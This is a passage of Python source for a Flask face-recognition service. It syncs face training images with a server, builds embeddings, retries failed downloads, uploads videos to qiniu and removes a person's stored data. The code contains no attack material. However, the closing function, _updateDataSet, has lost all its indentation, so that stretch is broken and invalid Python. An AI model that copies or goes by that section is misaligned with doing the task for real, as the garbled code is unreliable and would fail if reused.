                        aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
                        misc.imsave(img_path, aligned)
                        print('......')
                        print('img_path: ',img_path)
                        embedding = featureCalculation2(img_path)
                        print('----------')
                        #embedding = featureCalculation(img_path)
                        embedding_path = save_embedding.get_embedding_path(img_path)
                        save_embedding.create_embedding_string(embedding, embedding_path)
                        #print("1, type(embedding)={}".format(type(embedding)))
                    else:
                        # Embedding already on disk: load it instead of recomputing.
                        embedding_path = save_embedding.get_embedding_path(img_path)
                        embedding = save_embedding.read_embedding_string(embedding_path)
                        embedding = np.asarray(embedding)
                    recover_db(img_url, group_id, faceid, img_path, embedding, style=style)
                    #print('-> downloadTrainDatasets downloaded url {} to {}'.format(url['url'], img_path))
                else:
                    # Download failed or file invalid: clean up and queue for retry.
                    if img_path is not None and os.path.exists(img_path):
                        os.remove(img_path)
                    failedDownloadedItems.append(person)
    except Exception as ex:
        print('downloadTrainDatasets: except:', ex)
        # Remove possibly half-written files so the retry starts clean.
        if img_path and os.path.isfile(img_path):
            print('downloadTrainDatasets: Remove image from local {}'.format(img_path))
            os.remove(img_path)
        if embedding_path and os.path.isfile(embedding_path):
            print('downloadTrainDatasets: Remove embedding from local {}'.format(embedding_path))
            os.remove(embedding_path)
    return failedDownloadedItems
def disposeFinalSyncDatasetsThreadFunc(device_id, toid):
    """Synchronize the local training dataset with the server's copy.

    Fetches the dataset description for the current group, downloads
    missing images (retrying up to 3 times), deletes local DB rows and
    files that no longer exist on the server, removes local image files
    unknown to the DB, and reports statistics to the group chat.

    device_id/toid: sender and destination ids for sendMessage2Group;
        messages are only sent when both are non-trivial (len > 1).
    Returns True on success, False on HTTP/parse errors (None when the
    outer exception handler fires).
    """
    invalid_images_onserver = 0
    try:
        group_id = get_current_groupid()
        #host="http://localhost:3000/restapi/datasync/token/" + str(group_id)
        API_SERVER_ADDRESS = os.getenv('API_SERVER_ADDRESS','workaihost.tiegushi.com')
        API_SERVER_PORT = os.getenv('API_SERVER_PORT','80')
        host = 'http://'+API_SERVER_ADDRESS+':'+API_SERVER_PORT+'/restapi/datasync/token/' + str(group_id)
        result = None
        try:
            response = urlopen(host, timeout=10)
        except HTTPError as e:
            print('HTTPError: ', e.code)
            return False
        except URLError as e:
            print('URLError: ', e.reason)
            return False
        except Exception as e:
            print('Error: ', e)
            return False
        else:
            # everything is fine
            if 200 == response.getcode():
                result = response.readline()
                #print(result)
                result = json.loads(result)
                # Download with up to 3 retry rounds for items that failed.
                failedDownloadedItems = downloadTrainDatasets(result, group_id)
                try_count = 0
                while len(failedDownloadedItems) > 0:
                    try_count = try_count+1
                    print("len(failedDownloadedItems) = {}, try_count={}".format(len(failedDownloadedItems), try_count))
                    if try_count > 3:
                        print("We have tried 3 times to download the training dataset.")
                        break
                    failedDownloadedItems = downloadTrainDatasets(failedDownloadedItems, group_id)
                #Remove invalid data from local DB
                urlsInLocalDB = TrainSet.query.filter_by(group_id=group_id).all()
                urlsOnServer = dict()
                for person in result:
                    faceId = person.get("faceId")
                    urls = person.get("urls")
                    for url in urls:
                        img_url = url['url']
                        faceid = faceId
                        style = url['style']
                        # Unusable poses are counted but not treated as present.
                        if style == 'left_side' or style == 'right_side' or style == 'lower_head' or style == 'blury':
                            invalid_images_onserver += 1
                            continue
                        urlsOnServer[img_url] = group_id, faceId, style
                print("Trainsets: len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
                print("Trainsets: len(urlsOnServer) = {}".format(len(urlsOnServer)))
                # Delete rows whose URL is duplicated locally or gone from the server.
                urlsTemp = {}
                deleteUrlsInLocalDB = []
                if urlsInLocalDB:
                    for item in urlsInLocalDB:
                        image_path = None
                        #print("item = {}, item.url={}".format(item, item.url))
                        if (item.url in urlsTemp and urlsTemp[item.url] == 1) or item.url not in urlsOnServer.keys():
                            print("{}, {}, {}, {} is not on server, delete it from local DB.".format(item.url, item.group_id, item.face_id, item.style))
                            deleteUrlsInLocalDB.append(item)
                            if item.filepath:
                                image_path = item.filepath
                            db.session.delete(item)
                            db.session.commit()
                            if image_path and os.path.isfile(image_path):
                                print('Remove image from local {}'.format(image_path))
                                os.remove(image_path)
                            embedding_path = save_embedding.get_embedding_path(image_path)
                            if embedding_path and os.path.isfile(embedding_path):
                                print('Remove embedding from local {}:'.format(embedding_path))
                                os.remove(embedding_path)
                        urlsTemp[item.url] = 1
                    if len(deleteUrlsInLocalDB) > 0:
                        for item in deleteUrlsInLocalDB:
                            urlsInLocalDB.remove(item)
                urlsTemp = None
                print("Trainsets: 2, len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
                print("Trainsets: 2, len(urlsOnServer) = {}".format(len(urlsOnServer)))
                #Remove invalid photos from local
                dataset = []
                style = ''
                # if SVM_TRAIN_WITHOUT_CATEGORY is True:
                #     style = 'front'
                style = 'front'
                # NOTE(review): faceId here is whatever the last loop iteration left
                # behind; an empty *result* would leave it unbound (NameError,
                # swallowed by the outer except) — confirm this is intended.
                path = os.path.dirname(os.path.dirname(save_embedding.get_image_path('http://test/noname', group_id, faceId, style)))
                # style = ''
                # if SVM_TRAIN_WITHOUT_CATEGORY is True:
                #     style = 'front'
                print("path={}".format(path)) #Frank
                path_exp = os.path.expanduser(path)
                classes = [path for path in os.listdir(path_exp) \
                           if os.path.isdir(os.path.join(path_exp, path))]
                classes.sort()
                nrof_classes = len(classes)
                #print("classes={}".format(classes)) #Frank
                for i in range(nrof_classes):
                    class_name = classes[i]
                    if USE_DEFAULT_DATA is True:
                        # Never delete the synthetic default-face class.
                        if class_name == "groupid_defaultfaceid":
                            continue;
                    facedir = os.path.join(path_exp, class_name)
                    image_paths = []
                    print("facedir={}".format(facedir))
                    if os.path.isdir(facedir):
                        images = os.listdir(facedir)
                        for img in images:
                            dataset.append(os.path.join(facedir,img))
                willRemoveCount = 0
                print("len(dataset)={}".format(len(dataset))) #Frank
                #print("dataset={}".format(dataset))
                #print("urlsInLocalDB={}".format(urlsInLocalDB))
                if len(dataset) > 0:
                    for image_path in dataset:
                        # Compare paths with the 'front/' segment stripped from both sides.
                        l5 = (item for item in urlsInLocalDB if item.filepath.replace('front/','') == image_path.replace('front/',''))
                        count = sum(1 for x in l5)
                        if count == 0:
                            print("sum={}".format(count))
                            willRemoveCount = willRemoveCount+1
                            print("image_path({}) only in local, remove it.".format(image_path))
                            if image_path and os.path.exists(image_path):
                                os.remove(image_path)
                                print("Remove image_path={}".format(image_path))
                            embedding_path = save_embedding.get_embedding_path(image_path)
                            if embedding_path and os.path.isfile(embedding_path):
                                os.remove(embedding_path)
                            if len(device_id) > 1 and len(toid) > 1:
                                message = 'image_path({}) only in local, remove it.'.format(image_path)
                                print(message)
                                sendMessage2Group(device_id, toid, message)
                if len(device_id) > 1 and len(toid) > 1:
                    message = 'Stat: localDB={}, server={}/{}, localfiles={}'.format(len(urlsInLocalDB), len(urlsOnServer), invalid_images_onserver, len(dataset)-willRemoveCount)
                    print(message)
                    sendMessage2Group(device_id, toid, message)
                return True
            else:
                print('response code != 200')
                return False
    except Exception as ex:
        print('disposeFinalSyncDatasetsThreadFunc: except:', ex)
def disposeSyncStatusInfoThreadFunc(device_id, toid):
    """Report dataset sync statistics to the group chat without modifying data.

    Fetches the server-side dataset description for the current group,
    counts local DB rows, server images (excluding unusable poses) and
    local image files, then sends a one-line 'StatInfo' summary via
    sendMessage2Group when device_id and toid are non-trivial (len > 1).
    Returns True on success, False on HTTP/parse errors (None when the
    outer exception handler fires).
    """
    invalid_images_onserver = 0
    try:
        group_id = get_current_groupid()
        #host="http://localhost:3000/restapi/datasync/token/" + str(group_id)
        API_SERVER_ADDRESS = os.getenv('API_SERVER_ADDRESS','workaihost.tiegushi.com')
        API_SERVER_PORT = os.getenv('API_SERVER_PORT','80')
        host = 'http://'+API_SERVER_ADDRESS+':'+API_SERVER_PORT+'/restapi/datasync/token/' + str(group_id)
        result = None
        try:
            response = urlopen(host, timeout=10)
        except HTTPError as e:
            print('HTTPError: ', e.code)
            return False
        except URLError as e:
            print('URLError: ', e.reason)
            return False
        except Exception as e:
            print('Error: ', e)
            return False
        else:
            # everything is fine
            if 200 == response.getcode():
                result = response.readline()
                #print(result)
                result = json.loads(result)
                #Remove invalid data from local DB
                urlsInLocalDB = TrainSet.query.filter_by(group_id=group_id).all()
                urlsOnServer = dict()
                for person in result:
                    faceId = person.get("faceId")
                    urls = person.get("urls")
                    for url in urls:
                        img_url = url['url']
                        faceid = faceId
                        style = url['style']
                        # Unusable poses are counted but not treated as present.
                        if style == 'left_side' or style == 'right_side' or style == 'lower_head' or style == 'blury':
                            invalid_images_onserver += 1
                            continue
                        urlsOnServer[img_url] = group_id, faceId, style
                print("Trainsets: len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
                print("Trainsets: len(urlsOnServer) = {}".format(len(urlsOnServer)))
                #Remove invalid photos from local
                dataset = []
                # style = ''
                # if SVM_TRAIN_WITHOUT_CATEGORY is True:
                style = 'front'
                # NOTE(review): faceId is left over from the loop above; an empty
                # *result* leaves it unbound (NameError, swallowed by the outer
                # except) — confirm intended.
                path = os.path.dirname(os.path.dirname(save_embedding.get_image_path('http://test/noname', group_id, faceId, style)))
                style = ''
                if SVM_TRAIN_WITHOUT_CATEGORY is True:
                    style = 'front'
                print("path={}".format(path)) #Frank
                path_exp = os.path.expanduser(path)
                classes = [path for path in os.listdir(path_exp) \
                           if os.path.isdir(os.path.join(path_exp, path))]
                classes.sort()
                nrof_classes = len(classes)
                #print("classes={}".format(classes)) #Frank
                for i in range(nrof_classes):
                    class_name = classes[i]
                    facedir = os.path.join(path_exp, class_name)
                    image_paths = []
                    print("facedir={}".format(facedir))
                    if os.path.isdir(facedir):
                        images = os.listdir(facedir)
                        for img in images:
                            dataset.append(os.path.join(facedir,img))
                if len(device_id) > 1 and len(toid) > 1:
                    message = 'StatInfo: localDB={}, server={}/{}, localfiles={}'.format(len(urlsInLocalDB), len(urlsOnServer), invalid_images_onserver, len(dataset))
                    print(message)
                    sendMessage2Group(device_id, toid, message)
                return True
            else:
                print('response code != 200')
                return False
    except Exception as ex:
        print('disposeSyncStatusInfoThreadFunc: except:', ex)
# @app.before_first_request
def migration():
    """Run the database schema upgrade, preferring the bundled executable."""
    if os.path.exists('migrate_db.exe'):
        cmd = ['./migrate_db.exe', 'db', 'upgrade']
    else:
        cmd = ['python', 'migrate_db.py', 'db', 'upgrade']
    out_put = subprocess.check_output(cmd)
    print(out_put)
    print('> finish migrate upgrade')
@app.route('/api/status', methods=['GET'])
def get_status():
    """Report whether the service is currently busy updating its dataset."""
    global isUpdatingDataSet
    if isUpdatingDataSet is False:
        body, code = json.dumps({"status": "alive"}), 200
    else:
        body, code = json.dumps({"status": "busy"}), 401
    return Response(body, status=code, mimetype='application/json')
@app.route('/api/images/<filename>', methods=['GET'])
def img(filename):
    """Serve an uploaded image from UPLOAD_FOLDER, or 404 when absent."""
    upload_dir = app.config['UPLOAD_FOLDER']
    if not os.path.isfile(os.path.join(upload_dir, filename)):
        return abort(404)
    # Return the image file itself.
    return send_from_directory(upload_dir, filename)
def format_img_filename(old_filename):
    """Build a collision-safe upload filename.

    Joins the client uuid, this Flask instance's port and the current
    unix time so concurrent workers never produce the same name.

    :param old_filename: original filename (used only for its extension)
    :return: new_filename, uuid, ts
    """
    ext = old_filename.rsplit('.', 1)[-1]
    unix_time = time.time()
    uuid = request.args.get('uuid', '')
    ts = request.args.get('ts', str(unix_time * 1000))
    parts = [uuid, str(gFlask_port), str(unix_time).replace('.', ''), str(ts)]
    new_filename = '_'.join(parts) + '.' + ext
    return new_filename, uuid, ts
@app.route('/api/upload_video/', methods=['POST'])
def upload_video():
    """Upload a local video and its thumbnail to qiniu, then notify gst.

    Reads the local file paths from the POST form, uploads both assets
    under a uuid+timestamp key, falls back to a stock cover image when
    the thumbnail upload yields nothing, and posts the resulting payload.
    """
    video_local_path = request.form.get('videopath')
    thumbnail_local_path = request.form.get('thumbnail', '')
    ts = int(time.time()*1000)  # millisecond timestamp
    offset = time.timezone if (time.localtime().tm_isdst == 0) else time.altzone
    ts_offset = offset/60/60 * -1  # timezone offset in hours (e.g. 8)
    uuid = request.args.get('uuid', '')
    key = uuid + str(ts)
    # Upload the video itself; the return value is its playback URL.
    video_src = qiniu_upload_video(key+'video', video_local_path)
    # Upload the preview/cover image for the video.
    video_post = qiniu_upload_img(key+'thumbnail', thumbnail_local_path)
    person_id = request.args.get('objid', '')
    if len(video_post) < 1:
        video_post = 'http://data.tiegushi.com/fTnmgpdDN4hF9re8F_1493176458747.jpg'
    payload = {
        'uuid': uuid,
        'person_id': person_id,
        'video_post': video_post,
        'video_src': video_src,
        'ts': ts,
        'ts_offset': ts_offset,
    }
    post2gst_video(payload)
    print('upload_video'.center(50, '-'))
    print(payload)
    return Response(json.dumps({"result": "ok"}), status=200, mimetype='application/json')
def sendDebugLogToGroup(uuid, current_groupid, message):
    """Forward *message* to the group chat when debug logging is enabled."""
    if ENABLE_DEBUG_LOG_TO_GROUP is True:
        sendMessage2Group(uuid, current_groupid, message)
def showRecognizedImage(image_path, queue_index):
    """Copy a recognized face image next to itself as face<queue_index>.png."""
    if not os.path.exists(image_path):
        return
    target_name = 'face{}.png'.format(queue_index)
    target_path = os.path.join(os.path.dirname(image_path), target_name)
    shutil.copy(image_path, target_path)
# Per-style counters of face training images added since startup; used to
# decide when to trigger SVM retraining.
FACE_COUNT = defaultdict(int)
# Count of object (non-face) training images added since startup.
OBJ_COUNT = 0
def updateDataSet(url, objId, group_id, device_id, drop, img_type, sqlId, style, img_ts, rm_reason):
    """Wrapper around _updateDataSet that maintains the service busy flag.

    Sets the module-level isUpdatingDataSet flag (read by /api/status)
    for the duration of the update and swallows any exception so a bad
    item cannot kill the caller.
    """
    # BUG FIX: without this declaration the assignments created a local
    # variable, so the module flag read by /api/status never changed.
    global isUpdatingDataSet
    isUpdatingDataSet = True
    try:
        _updateDataSet(url, objId, group_id, device_id, drop, img_type, sqlId, style, img_ts, rm_reason)
    except Exception as ex:
        print("updateDataSet error:", ex)
        #raise
    finally:
        # Always reset the flag, whatever happened above.
        isUpdatingDataSet = False
# Primary JSON file recording image downloads that failed and must be retried.
FAILEDDOWNLOADINFOFILE = os.path.join(BASEDIR, 'failed_download_info.json')
# Secondary file written concurrently; merged into the primary by downloadFunc.
FAILEDDOWNLOADINFOFILE2 = os.path.join(BASEDIR, 'failed_download_info2.json')
# Serializes access to the two JSON files across threads.
fileMuxlock = threading.Lock()
def loadFailedDownloadInfo():
    """Read the primary failed-download record; default to an empty 'dInfo' list."""
    info = {'dInfo': []}
    if os.path.isfile(FAILEDDOWNLOADINFOFILE):
        with open(FAILEDDOWNLOADINFOFILE) as fJson:
            info = json.load(fJson)
    return info
def recordFailedDownload(url, group_id, face_id, style, device_id):
    """Append one failed-download entry to the primary record file."""
    info = loadFailedDownloadInfo()
    entry = {
        'url': url,
        'group_id': group_id,
        'face_id': face_id,
        'style': style,
        'device_id': device_id
    }
    info['dInfo'].append(entry)
    with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
        json.dump(info, fJson)
def loadFailedDownloadList(filepath):
    """Read a failed-download record file; default to an empty 'dInfo' list."""
    if os.path.isfile(filepath):
        with open(filepath) as fJson:
            return json.load(fJson)
    return {'dInfo': []}
def addFailedDownloadInfo(url, group_id, face_id, style, device_id):
    """Record a failed download in the secondary JSON file (thread-safe).

    Uses the secondary file so callers never contend with downloadFunc's
    rewrite of the primary file.
    """
    # BUG FIX: 'with' guarantees the lock is released even if file I/O
    # raises; the old acquire()/release() pair could deadlock other threads.
    with fileMuxlock:
        failedDownloadInfo = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE2)
        failedDownloadInfo['dInfo'].append({
            'url': url,
            'group_id': group_id,
            'face_id': face_id,
            'style': style,
            'device_id': device_id
        })
        print('addFailedDownloadInfo: url='+url)
        with open(FAILEDDOWNLOADINFOFILE2, 'w') as fJson:
            json.dump(failedDownloadInfo, fJson)
def mergeTwoJsonFiles():
    """Merge the secondary failed-download file into the primary one.

    Concatenates the 'dInfo' entry lists of both files, rewrites the
    primary file when non-empty, and removes the secondary file.
    Thread-safe via fileMuxlock.
    """
    # 'with' releases the lock even on exceptions (old code could deadlock).
    with fileMuxlock:
        failedDownloadInfo1 = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE)
        failedDownloadInfo2 = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE2)
        # BUG FIX: the old dict-comprehension over items()+items() raised
        # TypeError on Python 3 (dict views don't support '+') and, where it
        # ran, replaced file1's 'dInfo' list wholesale instead of merging.
        mergedJson = {'dInfo': failedDownloadInfo1.get('dInfo', []) + failedDownloadInfo2.get('dInfo', [])}
        if (len(mergedJson['dInfo']) > 0):
            print('mergeTwoJsonFiles: mergedJson=')
            for key, value in mergedJson.items():
                print(key, ':', value)
            with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
                json.dump(mergedJson, fJson)
        if (os.path.isfile(FAILEDDOWNLOADINFOFILE2)):
            os.remove(FAILEDDOWNLOADINFOFILE2)
def mergeFailedDownloadInfo(json1):
    """Merge *json1* ({'dInfo': [...]}) with the secondary file into the primary.

    Concatenates both 'dInfo' lists, rewrites the primary file when
    non-empty, and removes the secondary file. Thread-safe via fileMuxlock.
    """
    # 'with' releases the lock even on exceptions (old code could deadlock).
    with fileMuxlock:
        failedDownloadInfo = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE2)
        # BUG FIX: the old dict-comprehension over items()+items() raised
        # TypeError on Python 3 and otherwise dropped json1's entries by
        # letting the second dict's 'dInfo' overwrite the first's.
        mergedJson = {'dInfo': json1.get('dInfo', []) + failedDownloadInfo.get('dInfo', [])}
        if (len(mergedJson['dInfo']) > 0):
            print('mergeFailedDownloadInfo: mergedJson=')
            for key, value in mergedJson.items():
                print(key, ':', value)
            with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
                json.dump(mergedJson, fJson)
        if (os.path.isfile(FAILEDDOWNLOADINFOFILE2)):
            os.remove(FAILEDDOWNLOADINFOFILE2)
def downloadFunc():
    """Daemon loop: retry failed image downloads every 5 seconds.

    Merges the secondary failed-download file into the primary one, then
    retries each recorded download. Successful downloads get a denoised
    copy, an embedding file and a TrainSet DB row; entries that still
    fail are written back for the next round.
    """
    global FACE_COUNT
    global OBJ_COUNT
    while True:
        try:
            tmpFailedDownloadInfo = {}
            tmpFailedDownloadInfo['dInfo'] = []
            mergeTwoJsonFiles()
            failedDownloadInfo = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE)
            for info in failedDownloadInfo['dInfo']:
                if SVM_TRAIN_WITHOUT_CATEGORY is True:
                    info['style'] = 'front'
                img_path = save_embedding.get_image_path(info['url'], info['group_id'], info['face_id'], info['style'])
                embedding_path = save_embedding.get_embedding_path(img_path)
                denoise_path = save_embedding.get_image_denoise_path(img_path)
                recreate_embedding = False
                if not os.path.exists(img_path):
                    img_path = save_embedding.download_img_for_svm(info['url'], info['group_id'], info['face_id'], style=info['style'])
                if img_path:
                    if not os.path.exists(denoise_path):
                        img = misc.imread(os.path.expanduser(img_path))
                        save_embedding.save_image_denoise(img, denoise_path)
                        recreate_embedding = True
                    if not os.path.exists(embedding_path) or recreate_embedding == True:
                        # Manually cropped images need to be rescaled before embedding.
                        img = misc.imread(os.path.expanduser(denoise_path))
                        aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
                        misc.imsave(img_path, aligned)
                        embedding = featureCalculation(img_path)
                        embedding_path = save_embedding.get_embedding_path(img_path)
                        save_embedding.create_embedding_string(embedding, embedding_path)
                    old_train_set = TrainSet.query.filter_by(url=info['url'], group_id=info['group_id'], is_or_isnot=True, style=info['style']).first()
                    if not old_train_set:
                        train = TrainSet(url=info['url'], group_id=info['group_id'], is_or_isnot=True,
                                         device_id=info['device_id'], face_id=info['face_id'], filepath=img_path, drop=False, style=info['style'])
                        db.session.add(train)
                        db.session.commit()
                        FACE_COUNT[info['style']] += 1
                        print('-> SVM {} style face count'.format((FACE_COUNT[info['style']])))
                else:
                    # BUG FIX: was append({info}) — a set literal holding a dict,
                    # which raises TypeError (dict is unhashable) and lost the entry.
                    tmpFailedDownloadInfo['dInfo'].append(info)
            if (len(tmpFailedDownloadInfo['dInfo']) > 0):
                mergeFailedDownloadInfo(tmpFailedDownloadInfo)
                #with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
                #    json.dump(failedDownloadInfo, fJson)
            elif (os.path.isfile(FAILEDDOWNLOADINFOFILE)):
                os.remove(FAILEDDOWNLOADINFOFILE)
        except Exception as ex:
            print('except:', ex)
        time.sleep(5)
# Start the failed-download retry loop as a daemon thread so it never
# blocks interpreter shutdown.
tDownload = threading.Thread(target=downloadFunc)
tDownload.daemon = True
tDownload.start()
def dropPersonFunc(group_id, face_id, drop_person):
    """Delete every TrainSet row for (group_id, face_id) and its image directory.

    Runs only when drop_person is a true-ish flag ('true'/'True'/True);
    any exception is caught and printed so callers are never disrupted.
    """
    print('dropPersonFunc, group_id:', group_id, 'face_id:', face_id, 'drop_person:', drop_person)
    try:
        if drop_person not in ('true', 'True', True):
            return
        with app.app_context():
            rows = TrainSet.query.filter_by(group_id=group_id, face_id=face_id).all()
            dirname = None
            for row in rows:
                print('delete db, group_id:', group_id, 'face_id:', face_id, 'url:', row.url)
                if row.filepath:
                    dirname = row.filepath
                db.session.delete(row)
                db.session.commit()
            if dirname:
                # All files for the person live under the same directory.
                dirname = dirname.rsplit('/', 1)[0]
                print('dropPerson, remove dir:', dirname)
                shutil.rmtree(dirname, ignore_errors=True)
    except Exception as ex:
        print('dropPersonFunc ex:', ex)
def generate_embedding_ifmissing(data_dir):
    """Ensure every image under *data_dir* has a denoised copy and an embedding file.

    Walks the facenet-style dataset at data_dir; for each image, creates
    the denoised copy if missing and (re)creates the embedding file when
    it is absent or the denoised copy was just regenerated.
    """
    if not os.path.exists(data_dir):
        print("generate_embedding_ifmissing: data_dir is not exists! Please check it.")
        # BUG FIX: previously fell through and crashed in facenet.get_dataset().
        return
    dataset = facenet.get_dataset(data_dir)
    paths, labels = facenet.get_image_paths_and_labels(dataset)
    nrof_images = len(paths)
    for i in range(nrof_images):
        img_path = paths[i]
        embedding_path = save_embedding.get_embedding_path(img_path)
        denoise_path = save_embedding.get_image_denoise_path(img_path)
        print("denoise_path={}".format(denoise_path))
        recreate_embedding = False
        if not os.path.exists(denoise_path):
            img = misc.imread(os.path.expanduser(img_path))
            save_embedding.save_image_denoise(img, denoise_path)
            recreate_embedding = True
        if not os.path.exists(embedding_path) or recreate_embedding == True:
            embedding = featureCalculation2(denoise_path)
            save_embedding.create_embedding_string(embedding, embedding_path)
            print("Create missing embedding file: {}".format(embedding_path))
def check_default_data(group_id, style):
    """
    default_data is face data for SVM training. SVM training needs at least two classes.
    Check if there is default data. If not, add default data.

    Copies faces/default_data/default_face.png into a synthetic
    'groupid_defaultfaceid' class directory, rescales it to the model
    input size, and generates its embedding file when missing.

    :param group_id: group whose dataset is being checked
    :param style: pose subdirectory (e.g. 'front')
    :return: None
    """
    group_path = os.path.join(save_embedding.BASEPATH, group_id, style, save_embedding.img_dir)
    '''
    class_list = os.listdir(group_path)
    for one_class in class_list:
        class_id = one_class.split('_')[-1]
        # FIXME : Probably need to check all the files for default. Not just existence of image directory
        if class_id == 'default':
            return
    '''
    # Copy default face data
    default_dir_path = os.path.join(group_path, 'groupid_defaultfaceid')
    if not os.path.exists(default_dir_path):
        os.mkdir(default_dir_path)
    img_path = os.path.join(default_dir_path, 'default_face.png')
    if not os.path.isfile(img_path):
        default_data_path = os.path.join(BASEDIR, 'faces', 'default_data', 'default_face.png')
        shutil.copy(default_data_path, default_dir_path)
        # Generate denoise and embedding for default data
        img = misc.imread(os.path.expanduser(img_path))
        aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
        misc.imsave(img_path, aligned)
    '''
    denoise_path = save_embedding.get_image_denoise_path(img_path)
    save_embedding.save_image_denoise(aligned, denoise_path)
    '''
    embedding_path = save_embedding.get_embedding_path(img_path)
    if not os.path.isfile(embedding_path):
        embedding = featureCalculation2(img_path)
        save_embedding.create_embedding_string(embedding, embedding_path)
#updateDataSet(url=url, objId=face_id, group_id=group_id,drop=drop)
def _updateDataSet(url, objId, group_id, device_id, drop, img_type, sqlId, style, img_ts, rm_reason):
print("> MQTT url:{}, objId:{}, drop:{}, gid:{}, sqlId:{}, style:{}, rm_reason:{}".format(url, objId, drop,
group_id, sqlId, style, rm_reason))
face_id = str(objId)
if style is None:
print('Need to update client app !')
return
styles = style.split('|') # 如 ['left', 'rigth']
global FACE_COUNT
global OBJ_COUNT
print("> MQTT2 url:{}, objId:{}, drop:{}, gid:{}, sqlId:{}, style:{}, rm_reason:{}, group_id:{}, drop:{}, img_type:{}".format(url, objId, drop,
group_id, sqlId, style, rm_reason, group_id, drop, img_type))
if (url is None) or (objId is None) or (group_id is None) or (drop is None) or (img_type is None):
return
if (len(url) < 1) or (len(objId) < 1) or (len(group_id) < 1) or (len(img_type) < 1):
return
if EN_OBJECT_DETECTION is False and img_type == 'object':
return
with app.app_context():
#人脸: 未识别的图片点"删除"/合并的图片点"错"及点"删除", 在这里判断
if img_type == 'face' and sqlId is not None and (drop == 'true' or drop == 'True' or drop == True):
current_dirty_in_db = People.query.filter_by(aliyun_url=url, group_id=group_id).all()
old_dirty_in_db = People.query.filter_by(id=sqlId, uuid=device_id).all()
for d in old_dirty_in_db:
#old_dirty_in_db 是最开始new people时候存的的对比数据
print("remove origin dirty embedding url={}".format(d.aliyun_url))
db.session.delete(d)
db.session.commit()
for t in current_dirty_in_db:
if rm_reason is not None and rm_reason == "notface":
t.classId = "notface"
db.session.add(t)
db.session.commit()
print("update None-face image 1")
continue
#删除当前图片
print("remove current dirty embedding sqlId={}".format(sqlId))
db.session.delete(t)
db.session.commit()
#if SVM_CLASSIFIER_ENABLED is False:
for style in styles:
if style == 'dirty' or style == 'low_pixel' or style == 'blury':
continue
train_set = TrainSet.query.filter_by(url=url, group_id=group_id, style=style).all()
people_in_db = People.query.filter_by(group_id=group_id, aliyun_url=url).all()
if drop == 'true' or drop == 'True' or drop is True:
print(rm_reason)
if len(people_in_db) == 0 and rm_reason is not None and rm_reason == "notface":
print("insert not face image into people db")
url_tmp=url.split('/')
if len(url_tmp) > 0:
imgfilepath = save_embedding.download_img_only(url, 'tempdir')
insertOneImageIntoPeopleDB(imgfilepath, device_id, group_id, objId, url, notFace=True, style=style)
for t in train_set:
t.drop = True
db.session.delete(t)
db.session.commit()
#db.session.delete(t)
#delete the train image
filepath = t.filepath
print('drop train_set db:', filepath)
if filepath and os.path.exists(filepath):
os.remove(filepath)
for t in people_in_db:
if rm_reason is not None and rm_reason == "notface":
t.classId = "notface"
db.session.add(t)
db.session.commit()
print("update None-face image 2")
continue
print('drop people_in_db db & filepath:')
db.session.delete(t)
db.session.commit()
# labeled_img[person_id].remove(url)
else:
embedding = None
if len(people_in_db) == 0:
print("insert into people db")
url_tmp=url.split('/')
if len(url_tmp) > 0:
imgfilepath = save_embedding.download_img_only(url, 'tempdir')
embedding = insertOneImageIntoPeopleDB(imgfilepath, device_id, group_id, objId, url, notFace=False, style=style)
else:
for t in people_in_db:
print('update people_in_db classId %s as %s' %(t.classId, objId))
t.classId = objId
db.session.add(t)
db.session.commit()
old_train_set = TrainSet.query.filter_by(url=url, group_id=group_id, is_or_isnot=True, style=style).first()
print("old_train_set: {}, {}".format(old_train_set, url))
if not old_train_set:
print("insert one in db")
if SVM_TRAIN_WITHOUT_CATEGORY is True:
style = 'front'
train = TrainSet(url=url, group_id=group_id, is_or_isnot=True,
device_id=device_id, face_id=face_id, filepath='', drop=False, style=style)
db.session.add(train)
db.session.commit()
if img_type == 'object' and EN_OBJECT_DETECTION is True:
infile = gbottlenecks.downloadImg(url, group_id, face_id, train.id)
print(infile) # 原图路径
resize(infile)
os.remove(infile) # 保存resized的图片,删除原图
gbottlenecks.createAndCacheBottlenecks()
OBJ_COUNT += 1
train.filepath = infile
elif SVM_CLASSIFIER_ENABLED is True:
img_path = save_embedding.download_img_for_svm(url, group_id, face_id, style=style)
if img_path:
img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
denoise_path = save_embedding.get_image_denoise_path(img_path)
save_embedding.save_image_denoise(aligned, denoise_path)
embedding = featureCalculation2(denoise_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
train.filepath = img_path
print('-> insert: SVM {} style face count, url={}'.format((FACE_COUNT[style]), url))
else:
print('download failed, save to json file for future download: url={}'.format(url))
#recordFailedDownload(url, group_id, face_id, style, device_id)
addFailedDownloadInfo(url, group_id, face_id, style, device_id)
else:
print('face')
# 人脸训练过程:标注人脸 > 下载人脸对应URL图片 > 保存对应embedding并转换 > 训练
img_path = save_embedding.download_img(url, group_id, face_id, img_id=train.id, style=style)
img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
embedding = featureCalculation2(img_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
train.filepath = img_path
print('{} style face count'.format((FACE_COUNT[style])))
db.session.add(train)
db.session.commit()
elif old_train_set and old_train_set.face_id != face_id:
print("update one in db, url={}".format(url))
if old_train_set.drop == True:
print("this url is droped")
return
# url中的face不是 xxx
if SVM_TRAIN_WITHOUT_CATEGORY is True:
style = 'front'
